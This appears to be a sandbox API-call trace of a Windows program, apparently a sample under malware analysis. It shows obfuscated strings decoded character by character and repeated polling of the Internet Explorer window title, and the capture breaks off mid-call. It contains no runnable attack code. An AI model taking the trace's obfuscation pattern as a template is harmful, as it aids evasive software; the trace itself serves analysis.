CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.946] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0175.947] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.947] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0175.947] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.948] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0175.948] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.949] GetForegroundWindow () returned 0x10162 [0175.949] GetLastError () returned 0x0 [0175.949] SysStringLen (param_1=" ") returned 0xff [0175.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0175.949] SysStringLen (param_1=" ") returned 0xff [0175.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0175.949] GetWindowTextA (in: hWnd=0x10162, lpString=0x11644c4, nMaxCount=255 | out: lpString="Blank Page - Windows Internet Explorer") returned 38 [0175.950] GetLastError () returned 0x0 [0175.950] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0175.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0175.950] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0175.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Blank Page - Windows Internet Explorer") returned 256 [0175.950] SysStringLen (param_1="Blank") returned 0x5 [0175.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Blank", cchWideChar=6, lpMultiByteStr=0x1150ca4, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Blank", lpUsedDefaultChar=0x0) returned 6 [0175.951] SetWindowTextA (hWnd=0x103c4, lpString="Blank") returned 1 [0175.951] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xa [0175.951] GetFocus () returned 0x0 [0175.951] lstrlenA (lpString="Blank") returned 5 [0175.951] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x1150ca4) returned 0x1 [0175.952] IsWindow (hWnd=0x103c4) returned 1 [0175.952] IsWindow (hWnd=0x103c4) returned 1 [0175.952] IsWindow (hWnd=0x103c4) returned 1 [0175.957] IsWindow (hWnd=0x103c4) returned 1 [0175.957] GetFocus () returned 0x0 [0175.958] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0175.958] GetFocus () returned 0x0 [0175.958] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x6) returned 0x10ebcd0 [0175.958] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x6, lParam=0x10ebcd0) returned 0x5 [0175.958] GetFocus () returned 0x0 [0175.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0175.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank", cbMultiByte=-1, lpWideCharStr=0x1150ca4, cchWideChar=6 | out: lpWideCharStr="Blank") returned 6 [0175.959] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0175.959] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0175.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.960] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0175.961] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.961] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0175.962] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.962] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0175.962] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.964] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0175.964] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.965] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0175.965] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.965] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0175.966] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.966] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0175.967] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.967] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0175.968] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.161] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0176.161] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.162] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0176.162] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.163] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0176.163] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.164] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0176.164] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.164] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0176.165] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.165] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0176.166] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.166] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0176.167] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.167] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0176.168] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.168] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0176.168] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.169] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0176.169] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.170] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0176.170] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.175] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0176.176] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.176] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0176.177] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.177] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0176.177] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.178] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0176.178] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.178] GetForegroundWindow () returned 0x10162 [0176.179] GetLastError () returned 0x0 [0176.179] SysStringLen (param_1=" ") returned 0xff [0176.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0176.179] SysStringLen (param_1=" ") returned 0xff [0176.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0176.179] GetWindowTextA (in: hWnd=0x10162, lpString=0x11644c4, nMaxCount=255 | out: lpString="Blank Page - Windows Internet Explorer") returned 38 [0176.179] GetLastError () returned 0x0 [0176.180] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0176.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0176.180] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0176.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Blank Page - Windows Internet Explorer") returned 256 [0176.180] SysStringLen (param_1="Bla") returned 0x3 [0176.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Bla", cchWideChar=4, lpMultiByteStr=0x11684fc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bla", lpUsedDefaultChar=0x0) returned 4 [0176.181] SetWindowTextA (hWnd=0x103c4, lpString="Bla") returned 1 [0176.181] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0176.181] GetFocus () returned 0x0 [0176.181] lstrlenA (lpString="Bla") returned 3 [0176.181] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x11684fc) returned 0x1 [0176.181] IsWindow (hWnd=0x103c4) returned 1 [0176.182] IsWindow (hWnd=0x103c4) returned 1 [0176.182] IsWindow (hWnd=0x103c4) returned 1 [0176.182] IsWindow (hWnd=0x103c4) returned 1 [0176.182] GetFocus () returned 0x0 [0176.183] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0176.183] GetFocus () returned 0x0 [0176.183] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x4) returned 0x10ebcd0 [0176.183] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x4, lParam=0x10ebcd0) returned 0x3 [0176.183] GetFocus () returned 0x0 [0176.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Bla", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0176.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Bla", cbMultiByte=-1, lpWideCharStr=0x11684fc, cchWideChar=4 | out: lpWideCharStr="Bla") returned 4 [0176.183] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0176.183] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0176.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", 